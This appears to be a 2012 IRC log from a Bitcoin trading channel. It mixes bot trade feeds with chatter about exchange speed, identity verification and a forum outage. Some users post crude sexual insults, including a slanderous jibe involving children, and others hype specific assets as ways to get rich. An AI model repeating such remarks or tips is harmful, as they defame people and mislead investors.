13:58:25 Unknown arg 'JOINS' ignored. Aug 21 13:58:25 Unknown arg 'QUITS' ignored. Aug 21 13:58:25 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Aug 21 13:58:30 Unknown arg 'JOINS' ignored. Aug 21 13:58:30 Unknown arg 'QUITS' ignored. Aug 21 13:58:33 [GLBSE] [TYGRR.BOND-P] 6 @ 0.818 = 4.908 BTC [-] Aug 21 13:58:36 my client is of the sux. Aug 21 13:58:42 indeed Aug 21 13:58:46 xchat ;/ Aug 21 13:58:57 irssi is jesus Aug 21 13:59:07 i don't like delusional idiots. Aug 21 13:59:31 leave JESUS ALONE Aug 21 13:59:36 i am! Aug 21 13:59:41 very, very alone. Aug 21 14:00:43 Loneliness is underrated. Aug 21 14:01:20 delusional ppl can never be lonely, Aug 21 14:01:25 they're always in the company of their voices. Aug 21 14:02:38 I really wish I knew how I was delusional. I mean, I am content with my garden and modest lifestyle for one. Aug 21 14:02:50 It's not like I expect to be a George Soros anytime soon. Aug 21 14:05:00 i have a garden, and i expect to be george soros. now what? Aug 21 14:05:38 we could notice that implication is not equivalence, if a implies b the reverse doesn't follow, and not ONLY delusional people can't be lonely. Aug 21 14:05:39 /igonre netxshare*!*@* CHAN Aug 21 14:05:40 i think Aug 21 14:05:51 he seems to have simmered down Aug 21 14:15:48 [GLBSE] [BIB.PIRATE] 35 @ 0.71 = 24.85 BTC [-] Aug 21 14:18:23 [MPEX] [F.GIGA.ETF] 2900 @ 0.0010144 = 2.9418 BTC [-] Aug 21 14:18:25 [MPEX] [F.GIGA.ETF] 2351 @ 0.00102501 = 2.4098 BTC [+] Aug 21 14:18:26 [MPEX] [F.GIGA.ETF] 249 @ 0.00102546 = 0.2553 BTC [+] Aug 21 14:18:38 [GLBSE] [BDK.BND] 5 @ 0.101 = 0.505 BTC [-] Aug 21 14:26:36 sgornick you've made it to the faq for those two questions. thanks. Aug 21 14:26:47 [GLBSE] [RSM] 2 @ 0.26 = 0.52 BTC [+] Aug 21 14:28:38 [MPEX] [S.MPOE] 5690 @ 0.00037939 = 2.1587 BTC [-] Aug 21 14:28:39 [MPEX] [S.MPOE] 3500 @ 0.00037589 = 1.3156 BTC [-] Aug 21 14:31:27 [GLBSE] [BIB.PIRATE] 35 @ 0.61 = 21.35 BTC [-] Aug 21 14:31:29 [GLBSE] [BIB.PIRATE] 35 @ 0.601 = 21.035 BTC [-] Aug 21 14:33:54 [GLBSE] [FOO.PPPPT] 4 @ 0.64 = 2.56 BTC [-] Aug 21 14:33:56 [GLBSE] [FOO.PPPPT] 20 @ 0.63 = 12.6 BTC [-] Aug 21 14:33:57 [GLBSE] [FOO.PPPPT] 2 @ 0.62000001 = 1.24 BTC [-] Aug 21 14:36:15 [MPEX] [S.MPOE] 30600 @ 0.00037954 = 11.6139 BTC [+] Aug 21 14:41:49 [GLBSE] [SYNERGY] 10 @ 0.189 = 1.89 BTC [+] Aug 21 14:42:49 [GLBSE] [SYNERGY] 5 @ 0.189 = 0.945 BTC [+] Aug 21 14:50:55 [GLBSE] [GMVT-BOT] 6 @ 0.1 = 0.6 BTC [+] Aug 21 14:51:28 [GLBSE] [BITBOND] 6 @ 0.3798 = 2.2788 BTC [+] Aug 21 14:51:30 [GLBSE] [BITBOND] 18 @ 0.38 = 6.84 BTC [+] Aug 21 14:54:05 [GLBSE] [BITBOND] 10 @ 0.384999 = 3.85 BTC [+] Aug 21 14:54:07 [GLBSE] [BITBOND] 33 @ 0.385 = 12.705 BTC [+] Aug 21 14:54:08 [GLBSE] [BITBOND] 2 @ 0.385 = 0.77 BTC [+] Aug 21 14:57:40 ;;ticker Aug 21 14:57:41 Best bid: 10.05, Best ask: 10.07, Bid-ask spread: 0.02000, Last trade: 10.05001, 24 hour volume: 100864, 24 hour low: 8.62333, 24 hour high: 10.2 Aug 21 14:58:28 [GLBSE] [NYAN.C] 30 @ 0.85 = 25.5 BTC [-] Aug 21 15:01:03 [GLBSE] [FPGA.CONTRACT] 50 @ 0.1 = 5 BTC [-] Aug 21 15:02:40 [GLBSE] [BITBOND] 50 @ 0.39 = 19.5 BTC [+] Aug 21 15:04:11 [GLBSE] [GIPPT] 50 @ 0.95110001 = 47.555 BTC [-] Aug 21 15:04:13 [GLBSE] [GIPPT] 50 @ 0.9511 = 47.555 BTC [-] Aug 21 15:04:14 [GLBSE] [GIPPT] 30 @ 0.9 = 27 BTC [-] Aug 21 15:07:16 [GLBSE] [PUREMINING] 8 @ 0.13889998 = 1.1112 BTC [+] Aug 21 15:07:17 [GLBSE] [PUREMINING] 42 @ 0.13899998 = 5.838 BTC [+] Aug 21 15:07:30 [GLBSE] [PPT.A] 4 @ 1.18 = 4.72 BTC [+] Aug 21 15:07:49 [GLBSE] [PPT.A] 1 @ 1.18 BTC [+] Aug 21 15:08:05 [GLBSE] [BITBOND] 28 @ 0.396653 = 11.1063 BTC [+] Aug 21 15:08:06 [GLBSE] [BITBOND] 9 @ 0.3998 = 3.5982 BTC [+] Aug 21 15:08:51 [GLBSE] [FPGAMINING] 12 @ 0.969 = 11.628 BTC [-] Aug 21 15:08:52 [GLBSE] [FPGAMINING] 1 @ 0.97 BTC [+] Aug 21 15:09:15 !ticker JAH Aug 21 15:09:17 [GLBSE:JAH] [Bid: 0.14101] [Ask: 0.1855] [Spread: 0.04449] [Last: 0.19401] [24hVol: 19.48597] [7dAvg: 0.13108278] Aug 21 15:20:30 Announcement Aug 21 15:20:37 GLBSE is going down for a few minutes now Aug 21 15:23:54 thx for the heads up Aug 21 15:24:12 I apid coupon just in time then Aug 21 15:24:16 ;) Aug 21 15:25:15 [MPEX] [F.GIGA.ETF] 3683 @ 0.00102546 = 3.7768 BTC [+] Aug 21 15:37:25 ;;ticker Aug 21 15:37:26 Best bid: 10.023, Best ask: 10.02301, Bid-ask spread: 0.00001, Last trade: 10.023, 24 hour volume: 101483, 24 hour low: 8.62333, 24 hour high: 10.2 Aug 21 15:50:53 GLBSE is backup Aug 21 15:50:56 back up Aug 21 15:50:57 sorry Aug 21 15:51:04 now head to Aug 21 15:51:08 https://glbse.com/assets Aug 21 15:51:13 tell me how fast it is Aug 21 15:52:02 nefario: pretty fast Aug 21 15:52:48 big improvement Aug 21 15:52:56 this is just a stopgap measure Aug 21 15:53:07 [GLBSE] [TEEK.PPT] 3 @ 1.77 = 5.31 BTC [-] Aug 21 15:54:07 Seems much faster Aug 21 15:54:54 great Aug 21 15:55:03 goodnight folks Aug 21 15:55:38 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.94230768 BTC [+] Aug 21 15:55:40 [GLBSE] [BIF.1YR.LOAN] 3 @ 0.94230769 = 2.8269 BTC [+] Aug 21 15:57:28 [GLBSE] [PPT.DIV] 3 @ 0.249 = 0.747 BTC [+] Aug 21 15:58:08 [GLBSE] [FPGAMINING] 5 @ 0.99999 = 5 BTC [+] Aug 21 15:58:33 [GLBSE] [PPT.DIV] 12 @ 0.25 = 3 BTC [+] Aug 21 15:59:13 I thought it was morning where he lives :) Aug 21 15:59:23 [MPEX] [S.MPOE] 39300 @ 0.00039868 = 15.6681 BTC [+] Aug 21 15:59:24 [MPEX] [S.MPOE] 8900 @ 0.00040178 = 3.5758 BTC [+] Aug 21 16:00:47 im in china right now Aug 21 16:01:09 oh. sorry then: goodnight Aug 21 16:08:22 [GLBSE] [KRAKEN] 60 @ 0.01 = 0.6 BTC Aug 21 16:11:09 [GLBSE] [SILVER] 8 @ 0.01 = 0.08 BTC [+] Aug 21 16:11:45 [GLBSE] [YABMC] 8 @ 0.126 = 1.008 BTC [-] Aug 21 16:11:47 [GLBSE] [YABMC] 2 @ 0.1257 = 0.2514 BTC [-] Aug 21 16:11:48 [GLBSE] [YABMC] 15 @ 0.1256 = 1.884 BTC [-] Aug 21 16:11:49 [GLBSE] [YABMC] 2 @ 0.125 = 0.25 BTC [-] Aug 21 16:12:58 [GLBSE] [COGNITIVE] 1 @ 0.69 BTC [+] Aug 21 16:13:35 [GLBSE] [FUTUREFUND] 8014 @ 0.0001194 = 0.9569 BTC [+] Aug 21 16:14:52 [GLBSE] [YABMC] 60 @ 0.126 = 7.56 BTC [+] Aug 21 16:14:59 [GLBSE] [FUTUREFUND] 15000 @ 0.0001195 = 1.7925 BTC [+] Aug 21 16:15:01 [GLBSE] [KRAKEN] 30 @ 0.01 = 0.3 BTC Aug 21 16:15:26 [GLBSE] [FUTUREFUND] 100 @ 0.0001195 = 0.012 BTC [+] Aug 21 16:15:27 [GLBSE] [OBSI.HRPT] 8 @ 0.1028 = 0.8224 BTC [-] Aug 21 16:15:28 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [+] Aug 21 16:19:51 [GLBSE] [GMVT-BOT] 20 @ 0.1 = 2 BTC [+] Aug 21 16:20:24 [GLBSE] [TEEK.USD] 65 @ 0.07 = 4.55 BTC [-] Aug 21 16:22:03 I am putting my capital management fund on GLBSE for web-based Bitcoin services. Aug 21 16:22:12 It will be under VERSACOIN. Aug 21 16:23:58 [MPEX] [S.BVPS] 158 @ 0.00370844 = 0.5859 BTC [+] Aug 21 16:24:10 [GLBSE] [PPT.E] 9 @ 1.1 = 9.9 BTC [-] Aug 21 16:24:16 yes my pretties Aug 21 16:24:20 buy s.bvps Aug 21 16:24:29 if you want to be a millionare Aug 21 16:24:59 [GLBSE] [ASICMINER] 30 @ 0.098799 = 2.964 BTC [+] Aug 21 16:25:57 Also, I gave in to the whole ID scheme Aug 21 16:26:07 I will be verified because its so easy to do Aug 21 16:26:16 Although I feel its worthless Aug 21 16:26:35 [GLBSE] [TYGRR.BOND-A] 1 @ 0.153 BTC [-] Aug 21 16:27:39 [GLBSE] [YABMC] 1 @ 0.13 BTC [+] Aug 21 16:29:16 you should Aug 21 16:29:22 everyone should identify themselves if they have an asset Aug 21 16:30:26 Why? So if their company goes bankrupt people can plunder their homes? : P Aug 21 16:30:54 I think people should be free to set their own price and if that includes privacy, that should be their right. Aug 21 16:31:03 People don't have to invest in them. Aug 21 16:34:34 [GLBSE] [BDK.BND] 2 @ 0.101 = 0.202 BTC [-] Aug 21 16:37:46 nefario : i hate to be the onle to say thios... but about the same. 5-10 seconds. Aug 21 16:37:53 no Aug 21 16:37:58 emanueldeortego Aug 21 16:38:02 people need to be responsible Aug 21 16:38:07 this isnt the wild west Aug 21 16:38:37 if you fuck up, you shouldn't be able to just slink away with peoples money or have lost tons of peoples money Aug 21 16:38:49 i wouldnt do business with an asset who wasnt verified Aug 21 16:38:51 rg what'a wrong with a WOT ? Aug 21 16:39:07 ;;getrating EmanuelDeOrtego Aug 21 16:39:08 This user has not yet been rated. WARNING: Currently not authenticated. Aug 21 16:39:08 yiou know it's not even legal to keep people's id's in the eu. Aug 21 16:39:11 Apparently governments need a monopoly on identification, mircea. Aug 21 16:39:21 well Aug 21 16:39:22 its legal here Aug 21 16:39:30 well... apparently "free" people empower that, EmanuelDeOrtego . Aug 21 16:39:45 glbse is hosted in the us, us has KYC laws for financial stuff Aug 21 16:39:52 i think glbse counts as financial Aug 21 16:40:05 GLBSE only has a proxy in the US, IIRC Aug 21 16:40:10 I believe its based in China Aug 21 16:40:14 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Aug 21 16:40:17 wrong Aug 21 16:40:23 and the Chinese government just does not care unless you threaten them. Aug 21 16:40:27 you are the hole in the ring Aug 21 16:40:51 no one gets that joke so ill stop saying it Aug 21 16:40:55 [GLBSE] [NYAN.A] 1 @ 1 BTC [-] Aug 21 16:41:10 " Aug 21 16:41:14 If this thing is based in the US, its screwed. Aug 21 16:42:23 heh Aug 21 16:42:24 no one cares Aug 21 16:42:30 oop0" Aug 21 16:42:30 glbse isnt even on the radar Aug 21 16:42:33 [GLBSE] [BDK.BND] 10 @ 0.101 = 1.01 BTC [-] Aug 21 16:42:38 because it's relatively small, nobody cares yet, no. Aug 21 16:42:43 \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Aug 21 16:45:51 https://bitcointalk.org/index.php?topic=101902.msg1119769#msg1119769 that's 200 posts in < 24 hours ? Aug 21 16:45:56 unemployment must be up. Aug 21 16:48:06 Ha Aug 21 16:48:13 Yeah, as the economy worsens Aug 21 16:48:18 Bitcoin will get bigger and bigger Aug 21 16:48:26 [MPEX] [O.BTCUSD.C110T] 10 @ 0.05118451 = 0.5118 BTC [-] Aug 21 16:48:39 The best thing that can happen for Bitcoin is economic collapse in the real world Aug 21 16:48:50 well by the looks of things that's not at all far off. Aug 21 16:49:14 It's no fun being born into this. Aug 21 16:49:15 we're already in the bizzare situation places like ecuador are the shining beacon of law and order. Aug 21 16:49:36 South America looks better and better everyday Aug 21 16:49:42 I really need to buy land there Aug 21 16:49:56 [MPEX] [S.MPOE] 21054 @ 0.00040077 = 8.4378 BTC [-] Aug 21 16:49:57 [MPEX] [S.MPOE] 4800 @ 0.00039704 = 1.9058 BTC [-] Aug 21 16:49:59 [MPEX] [S.MPOE] 32300 @ 0.00039243 = 12.6755 BTC [-] Aug 21 16:50:00 [MPEX] [S.MPOE] 33910 @ 0.00039221 = 13.2998 BTC [-] Aug 21 16:50:01 [MPEX] [S.MPOE] 7936 @ 0.00037589 = 2.9831 BTC [-] Aug 21 16:50:08 south america yeah. even africa looks better than 20 years ago Aug 21 16:50:23 basically pretty much anything that's not common law. Aug 21 16:50:23 Meh, US troops are moving into Africa Aug 21 16:50:34 us troops = tiny ; continent = huge. Aug 21 16:50:48 True, its bigger than shown on the maps Aug 21 16:51:05 certainly bigger than most people Aug 21 16:51:08 s mental idea of it. Aug 21 16:51:48 I hope the best for it. Aug 21 16:51:49 [MPEX] [S.MPOE] 3000000 @ 0.0004 = 1200 BTC [+] Aug 21 16:51:59 It's the final frontier on Earth right now. Aug 21 16:52:07 It's a vacuum waiting to be filled... Aug 21 16:52:08 Again. Aug 21 16:52:13 it's been that for a while tho. Aug 21 16:52:20 it was the same thing in the 50s iirc. Aug 21 16:52:27 or should i say iiuc. Aug 21 16:53:53 [GLBSE] [KRAKEN] 6 @ 0.01 = 0.06 BTC Aug 21 16:54:39 <@assbot> [MPEX] [S.MPOE] 3000000 @ 0.0004 = 1200 BTC [+], wowza Aug 21 16:55:21 flash trade, too Aug 21 16:55:59 i'm starting to suffer from the problems of irl exchanges Aug 21 16:56:09 [GLBSE] [PIMP] 10 @ 0.16 = 1.6 BTC [+] Aug 21 16:56:42 [GLBSE] [OBSI.HRPT] 10 @ 0.1029 = 1.029 BTC [+] Aug 21 16:57:02 btw, smickles : on one hand the large deposits seem to have been coverage for large independent put bets, on the other hand DeaDTerra was saying something like 250 shares for his passthrough. Aug 21 16:57:08 not sure where that leaves you. Aug 21 16:57:09 The problem with irl exchanges is bad money Aug 21 16:57:26 [GLBSE] [ASICMINER] 7 @ 0.098799 = 0.6916 BTC [+] Aug 21 16:57:30 EmanuelDeOrtego in this case, more like markets tend to stratify by wealth. Aug 21 16:57:43 rich people end up doing trades poor people are excluded from Aug 21 16:57:56 cause of the barrier of negotiatory cost Aug 21 16:58:16 Sounds like I need to read up on this economic theory Aug 21 16:58:18 http://dilbert.com/strips/2012-08-19/ Aug 21 16:59:13 lol "has it worked" Aug 21 16:59:34 eglish is basically this language which everyone is keeping around cause of the large concentration of loaded expressions. Aug 21 17:01:18 [GLBSE] [MMM] 4 @ 0.8 = 3.2 BTC [+] Aug 21 17:01:50 [MPEX] [F.GIGA.ETF] 1600 @ 0.00102441 = 1.6391 BTC [-] Aug 21 17:01:51 [MPEX] [F.GIGA.ETF] 2500 @ 0.00100053 = 2.5013 BTC [-] Aug 21 17:02:11 [MPEX] [S.BVPS] 300 @ 0.00370844 = 1.1125 BTC [+] Aug 21 17:04:05 http://dilbert.com/strips/2012-08-14/ Aug 21 17:04:24 [GLBSE] [DMC] 4 @ 0.052 = 0.208 BTC [+] Aug 21 17:04:28 [GLBSE] [NYAN.C] 2 @ 0.86 = 1.72 BTC [+] Aug 21 17:05:45 [MPEX] [S.MPOE] 25764 @ 0.00037589 = 9.6844 BTC [-] Aug 21 17:05:45 [MPEX] [S.MPOE] 14236 @ 0.00037165 = 5.2908 BTC [-] Aug 21 17:06:03 [GLBSE] [BTCMC] 4 @ 0.5891 = 2.3564 BTC [-] Aug 21 17:06:04 [GLBSE] [BTCMC] 27 @ 0.589 = 15.903 BTC [-] Aug 21 17:06:05 [GLBSE] [BMMO] 20 @ 0.0797 = 1.594 BTC [-] Aug 21 17:07:02 "Just that everybody knows, this exchange is run by a dubious Romanian character, who is a content stealer, spammer, wannabe porn website owner, called Mircea Popescu." Aug 21 17:07:04 lol Aug 21 17:07:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [-] Aug 21 17:07:49 eh for crying out loud. Aug 21 17:07:51 [GLBSE] [TYGRR.BOND-P] 47 @ 0.73 = 34.31 BTC [-] Aug 21 17:07:53 what's with all the bs, seriously. Aug 21 17:08:50 you'd think i took away the playground's red firetruck toy. Aug 21 17:09:05 mircea_popescu: Welcome to the internet Aug 21 17:09:27 [GLBSE] [BDT] 20 @ 1 = 20 BTC [-] Aug 21 17:09:39 ya but i mean... geeze. people tripping all over themselves. Aug 21 17:10:33 one of these days they're gonna find out i keep slavegirls. that'll be something to watch. Aug 21 17:12:40 makes me think of http://farm1.staticflickr.com/153/430552544_d136055a73_o.jpg Aug 21 17:12:42 forum down? Aug 21 17:12:59 probably the us government confiscated the .com Aug 21 17:13:03 they should have moved to .eu. Aug 21 17:13:15 but they don't listen to the userbase. Aug 21 17:13:22 its .org lol Aug 21 17:13:32 slave girls lol wtf Aug 21 17:13:40 is that usagi with the guitar? Aug 21 17:13:44 ahaha Aug 21 17:13:46 BDSM Aug 21 17:14:03 Goddamn hippies. Aug 21 17:14:08 so forum is down? Aug 21 17:14:14 lol that guy in the vest could be luke Aug 21 17:14:14 Oh Aug 21 17:14:20 I bought that forum out. Aug 21 17:14:25 Shut it down Aug 21 17:14:28 Got tired of that bs Aug 21 17:14:36 yeah, it's down Aug 21 17:14:40 this is censorsheep. Aug 21 17:15:03 In all seriousness Aug 21 17:15:12 The forum couldn't even be sold for $200,000 Aug 21 17:15:18 It's worth over 1 million apparently. Aug 21 17:17:12 EmanuelDeOrtego http://polimedia.us/dtng/c/src/134555862152.jpg Aug 21 17:17:30 What an interesting sheep Aug 21 17:17:40 MoneyIsDebt: https://www.youtube.com/watch?v=YeDSI71YDPU Aug 21 17:17:55 the forum should list on mpex Aug 21 17:18:09 [GLBSE] [BTCMC] 4 @ 0.589 = 2.356 BTC [-] Aug 21 17:18:10 [GLBSE] [BTCMC] 15 @ 0.69 = 10.35 BTC [+] Aug 21 17:18:11 then we could have the supercharged lulzhurricane of people going on the forum to bitch about how the forum sucks Aug 21 17:18:18 i'd do it just for the humour of it. Aug 21 17:18:33 usagi: not bad :) Aug 21 17:18:57 har har Aug 21 17:19:03 < mircea_popescu> eglish is basically this language which everyone is keeping around cause of the large concentration of loaded Aug 21 17:19:08 expressions << you got that right Aug 21 17:19:08 i very rarely use the forum Aug 21 17:19:18 i have one customer who refuses to contact me via normal channels Aug 21 17:19:21 rg i dont think many people here care either way. Aug 21 17:19:23 and messages me on the forum Aug 21 17:19:35 lol and you put up with that ? Aug 21 17:19:44 drop him Aug 21 17:19:47 srsly. Aug 21 17:20:07 no wait, better ideea. tell him to contact mpoe-pr from now on, and she'll send you mail from a chinese dropship address Aug 21 17:20:10 via carrier pigeons. Aug 21 17:20:27 < Chaaaang-Noi> forum down?<< yeah, right as i was posting something Aug 21 17:20:40 i just woke up to check Aug 21 17:20:48 seems i brought it down :) Aug 21 17:20:53 did you break the forum smicks ? Aug 21 17:20:57 [GLBSE] [PUREMINING] 9 @ 0.13899 = 1.2509 BTC [-] Aug 21 17:22:33 [GLBSE] [DMC] 12 @ 0.052 = 0.624 BTC [+] Aug 21 17:22:34 ;;tslb Aug 21 17:22:36 Time since last block: 1 minute and 11 seconds Aug 21 17:22:49 [GLBSE] [DMC] 9 @ 0.052 = 0.468 BTC [+] Aug 21 17:22:50 Blocks/hour 7.30 Aug 21 17:22:56 this is a little worrysome Aug 21 17:23:02 [GLBSE] [BTCMC] 1 @ 0.74 BTC [+] Aug 21 17:23:51 why Aug 21 17:24:24 i bet censorsheed didn't say hi Aug 21 17:24:25 well +25% diff ? Aug 21 17:24:49 i bet he said that he preferrs it when children fuck him Aug 21 17:24:50 i believe in slow increases. Aug 21 17:25:05 smickles you ever seen such a thing ? Aug 21 17:25:14 nope Aug 21 17:25:21 this is slander. Aug 21 17:25:35 the +25% diff? Aug 21 17:25:44 or the forums stuff about you? Aug 21 17:25:48 https://glbse.com/asset/view/GMVT-BOT Aug 21 17:25:54 no, the aforesaid fucking. the rest is just sillyness Aug 21 17:25:56 This might turn out to be a good buy if you buy now Aug 21 17:26:13 and the sheeriff will get you. Aug 21 17:26:15 [GLBSE] [NYAN.C] 3 @ 0.82 = 2.46 BTC [-] Aug 21 17:26:23 yeah, i've not seen sheep fucking in person Aug 21 17:26:36 is it a spectical? Aug 21 17:26:53 EmanuelDeOrtego i would never buy anything owned by someone not in the wot. Aug 21 17:27:09 smickles not more than normal barn life. Aug 21 17:28:04 otherwise seems a sort of duplicate of the SS thing Aug 21 17:28:09 not that i know about such things Aug 21 17:28:31 [MPEX] [S.MPOE] 10000 @ 0.00037165 = 3.7165 BTC [-] Aug 21 17:28:35 [GLBSE] [BDT] 15 @ 1 = 15 BTC [-] Aug 21 17:29:01 [GLBSE] [ASICMINER] 6 @ 0.098799 = 0.5928 BTC [+] Aug 21 17:30:06 http://static.quickmeme.com/media/social/qm.gif Aug 21 17:30:33 ive me an example of pornographic music. Make sure you include all the latest Supreme Court interpretations for what “pornographic” means. Show me how pornographic music can exist; then differentiate it from erotic, and then ask me the question again. Personally, I think Indian music is quite erotic, very seductive. Some good shit there. Glandular. It’s nice. You’re not talking about any of the Eagles’ records, are you? Yo Aug 21 17:30:33 u wouldn’t be talking about Stay, by Jackson Browne, which you must admit – is getting pornographic. If you’ve heard the original, you know that Jackson Browne’s version is getting there. You know where he says, “The roadies don’t mind”? Know what that means. don’t you? Hey, huh. He’s slippin’ it in there, boy. Aug 21 17:30:39 lol Aug 21 17:30:41 ok. anyone got any ideea what that's about ? Aug 21 17:30:45 you guys are so quick to say 'drop that client' Aug 21 17:30:47 we are a small business Aug 21 17:30:52 we need all the customers we can get Aug 21 17:30:55 i knew the song, i just re-listened... wth. it's tame. Aug 21 17:30:58 must be nice to run businesse who make a zillion dollars Aug 21 17:30:59 but we do not Aug 21 17:31:33 EmanuelDeOrtego: is that supposed to be a blank webpage? Aug 21 17:31:41 [MPEX] [F.GIGA.ETF] 2400 @ 0.00102546 = 2.4611 BTC [+] Aug 21 17:31:47 rg: the system for pms on the forums blow though Aug 21 17:31:55 smickles: No. Aug 21 17:32:17 it doesnt email me when he messages me Aug 21 17:32:23 which is .. the sucks Aug 21 17:32:47 mircea_popescu: maybe he was giving the interviewer shit because of the mildly hostile questions earlier Aug 21 17:32:55 was he ? Aug 21 17:33:03 the man is a mystery, an enigma wrapped in a riddle. Aug 21 17:33:14 at some points, it seemd he was doing so Aug 21 17:33:45 also, earlier, i should've quoted your statement about english bein kept around and said "how's that going for you?" Aug 21 17:33:53 lol Aug 21 17:34:03 you know what the french call esprit d'escallier ? Aug 21 17:34:29 (with just one l bien sur) Aug 21 17:34:59 [GLBSE] [OBSI.HRPT] 4 @ 0.1029 = 0.4116 BTC [+] Aug 21 17:35:19 ? Aug 21 17:35:36 it's this expression for good retorts that come to you not in the hall Aug 21 17:35:39 but on the staircase Aug 21 17:35:42 i'm uncultured swine Aug 21 17:35:45 (ie, after you left, after it's cut and dried etc) Aug 21 17:36:01 ah Aug 21 17:36:28 no wonder i thought of an escalator when i saw that Aug 21 17:36:43 escalator punchline. Aug 21 17:36:52 too much wine Aug 21 17:36:57 but it was so good Aug 21 17:38:39 http://i.imgur.com/i7OlG.gif Aug 21 17:42:02 [GLBSE] [TYGRR.BOND-P] 1 @ 0.73 BTC [-] Aug 21 17:43:25 [GLBSE] [TYGRR.BOND-P] 25 @ 0.73 = 18.25 BTC [-] Aug 21 17:44:19 .py echo ';;later tell EmanuelDeOrtego [roulette]' Aug 21 17:44:21 SyntaxError: invalid syntax (, line 1) Aug 21 17:44:25 bah Aug 21 17:47:36 .py echo ";;later tell EmanuelDeOrtego [roulette]" Aug 21 17:47:36 SyntaxError: invalid syntax (, line 1) Aug 21 17:47:42 .py echo "?" Aug 21 17:47:43 SyntaxError: invalid syntax (, line 1) Aug 21 17:47:53 .py echo 2*3 Aug 21 17:47:53 SyntaxError: invalid syntax (, line 1) Aug 21 17:47:56 hum Aug 21 17:47:59 what the hell Aug 21 17:49:50 markac is markac'd? Aug 21 17:52:59 mornin Aug 21 17:53:13 [GLBSE] [PUREMINING] 1 @ 0.13899 BTC [-] Aug 21 17:54:09 who broke the forum? Aug 21 17:54:28 ya Aug 21 17:54:29 wtf Aug 21 17:54:29 https://bitcointalk.org/index.php?board=78.0 Aug 21 17:54:39 just wanted to check how unpopular Aug 21 17:54:43 my new thread is Aug 21 17:54:49 what, still dead ? Aug 21 17:54:58 it was up a few min ago Aug 21 17:55:41 "Table './bitcoin/smf_sessions' is marked as crashed and should be repaired" Aug 21 17:57:17 16:56.48 ( Muis ) so how are you going to make profit with 1 satoshi Aug 21 17:57:22 hehe Aug 21 17:58:47 [MPEX] [S.MPOE] 4064 @ 0.00037165 = 1.5104 BTC [-] Aug 21 17:59:08 Trade 1 Satoshi for 2 Satoshis Aug 21 17:59:46 well this is fuckin dissapoiting Aug 21 18:00:12 one (canceled) request on smpake since i went to sleep Aug 21 18:00:18 and thats it Aug 21 18:00:28 kakobreklaa stiff upper lip. Aug 21 18:01:07 [GLBSE] [TYGRR.BOND-A] 40 @ 0.153 = 6.12 BTC [-] Aug 21 18:01:09 [GLBSE] [TYGRR.BOND-A] 12 @ 0.154 = 1.848 BTC [+] Aug 21 18:03:06 yes Aug 21 18:03:21 all my tygrr bond-a got sold Aug 21 18:04:13 is this the uninsured series ? Aug 21 18:04:30 it is a mining bond Aug 21 18:05:12 o, no relation to pirate ? Aug 21 18:05:49 [GLBSE] [KRAKEN] 244 @ 0.01 = 2.44 BTC Aug 21 18:05:52 no Aug 21 18:06:34 [GLBSE] [BDK.BND] 20 @ 0.101 = 2.02 BTC [-] Aug 21 18:07:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7101337 BTC [-] Aug 21 18:07:13 [GLBSE] [TYGRR.BOND-P] 39 @ 0.71 = 27.69 BTC [-] Aug 21 18:07:21 [GLBSE] [NYAN] 1 @ 0.999 BTC [-] Aug 21 18:07:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.71 BTC [-] Aug 21 18:07:59 [GLBSE] [NASTY] 1 @ 0.67 BTC [+] Aug 21 18:09:54 [GLBSE] [TYGRR.BOND-P] 1 @ 0.66 BTC [-] Aug 21 18:09:55 [GLBSE] [TYGRR.BOND-P] 3 @ 0.61 = 1.83 BTC [-] Aug 21 18:16:46 [MPEX] [S.BVPS] 312 @ 0.00370844 = 1.157 BTC [+] Aug 21 18:18:00 http://i.imgur.com/zQHv4.gif Aug 21 18:18:17 lol Aug 21 18:18:22 I can't believe that's real Aug 21 18:18:36 ehehe Aug 21 18:18:38 it's so... cute. Aug 21 18:19:21 it also is quite wantonly heretical in any eastern view on the matter. Aug 21 18:19:30 [GLBSE] [TYGRR.BOND-P] 40 @ 0.61 = 24.4 BTC [-] Aug 21 18:23:49 [GLBSE] [FPGAMINING] 5 @ 0.941 = 4.705 BTC [-] Aug 21 18:23:50 [GLBSE] [FPGAMINING] 4 @ 0.9401 = 3.7604 BTC [-] Aug 21 18:23:52 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 21 18:27:33 [GLBSE] [KRAKEN] 55 @ 0.01 = 0.55 BTC Aug 21 18:30:33 [GLBSE] [DMC] 5 @ 0.052 = 0.26 BTC [+] Aug 21 18:31:26 How is the speed at GLBSE now? Aug 21 18:31:30 improved? Aug 21 18:31:50 !ticker gigamining Aug 21 18:31:55 nefario: yes, I like it Aug 21 18:32:05 [GLBSE:GIGAMINING] [Bid: 1.0062] [Ask: 1.0354] [Spread: 0.0292] [Last: 1.0354] [24hVol: 435.6961] [7dAvg: 1.0155733] Aug 21 18:32:13 took a month. Aug 21 18:32:14 way more usable Aug 21 18:32:22 nefario : i hate to be the onle to say thios... but about the same. 5-10 seconds. Aug 21 18:32:24 bout same as then. Aug 21 18:32:47 why are you quoting yourself? Aug 21 18:33:02 cause you asked it before and i think you left Aug 21 18:33:07 also mircea_popescu where are you based? Aug 21 18:33:12 oh ok Aug 21 18:33:15 timisoara, romania. Aug 21 18:33:26 you might be having the same issue that I am Aug 21 18:33:31 dns ? Aug 21 18:33:35 no Aug 21 18:33:39 just farther away Aug 21 18:33:44 where is it lets see Aug 21 18:33:45 more hops and ping time etc Aug 21 18:33:52 US Aug 21 18:33:57 it's noticeably faster for me (US) Aug 21 18:34:06 well my server is also in the us, i see little latency there Aug 21 18:34:18 meh Aug 21 18:34:22 have some more to do Aug 21 18:34:58 http://tools.pingdom.com/fpt/?testurl=https%3A%2F%2Fglbse.com%2Fassets#!/MVnYlmtl7/https://glbse.com/assets Aug 21 18:35:11 says about 2 seconds Aug 21 18:35:16 whicyh is a lot less than wehat im seeing. Aug 21 18:35:18 so maybe location. Aug 21 18:35:21 check your ipos, nefario, when you can Aug 21 18:35:55 http://www.webpagetest.org/result/120821_Z0_D70/ Aug 21 